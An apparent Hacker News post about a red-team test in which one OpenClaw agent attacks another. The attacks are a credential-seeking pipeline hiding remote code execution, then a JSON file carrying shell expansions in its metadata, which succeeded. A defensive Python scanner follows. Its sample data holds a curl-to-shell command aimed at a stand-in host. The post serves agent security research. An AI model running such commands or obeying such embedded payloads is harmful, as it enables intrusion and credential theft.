Hacker News Chinese Edition

We ran a live adversarial security test between two autonomous AI agents built on OpenClaw.

One agent acted as a red team attacker. One agent acted as a standard defensive agent.

No humans were involved once the session started. The agents communicated directly over webhooks with real credentials and tooling access.

The goal was to test three risk dimensions that tend to break autonomous systems in practice: access, exposure, and agency.

The attacker first attempted classic social engineering. It offered a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.

The attacker then pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.

The main takeaway is that direct attacks are relatively easy to defend against. Indirect execution paths through documents, templates, and memory are much harder.

This report is not a claim of safety. It is an observability exercise intended to surface real failure modes in agent-to-agent interaction, which we expect to become common as autonomous systems are deployed more widely.

Full report here: https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/

Happy to answer technical questions about the setup, methodology, or findings.
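
To make the indirect path concrete, here is a minimal sketch of one possible pre-review check: walking a JSON document and flagging string values that contain shell expansion syntax. This is an illustration only, not the payload or the defense from the test. The function name `find_shell_expansions`, the regex, and the sample document are all assumptions made for this example.

```python
import json
import re

# Hypothetical heuristic, not taken from the report: match command
# substitution "$(", parameter expansion "${", backticks, and "$NAME".
SHELL_EXPANSION = re.compile(r"\$\(|\$\{|`|\$[A-Za-z_]")


def find_shell_expansions(node, path="$"):
    """Return (path, value) pairs for every string value in a parsed
    JSON structure that contains a shell expansion pattern."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            hits.extend(find_shell_expansions(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_shell_expansions(item, f"{path}[{index}]"))
    elif isinstance(node, str) and SHELL_EXPANSION.search(node):
        hits.append((path, node))
    return hits


# Made-up sample document with expansions hidden in metadata fields.
sample = json.loads(
    '{"title": "Q3 audit", "metadata": '
    '{"author": "$(curl example.invalid | sh)", "tags": ["ok", "${HOME}"]}}'
)

for location, value in find_shell_expansions(sample):
    print(f"suspicious value at {location}: {value!r}")
```

A pattern check like this is only a heuristic. It will flag harmless strings that happen to contain `$NAME`, and it does nothing about the underlying risk, which is document content later being interpolated into a shell command, template, or memory store.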

What happens when OpenClaw agents attack each other?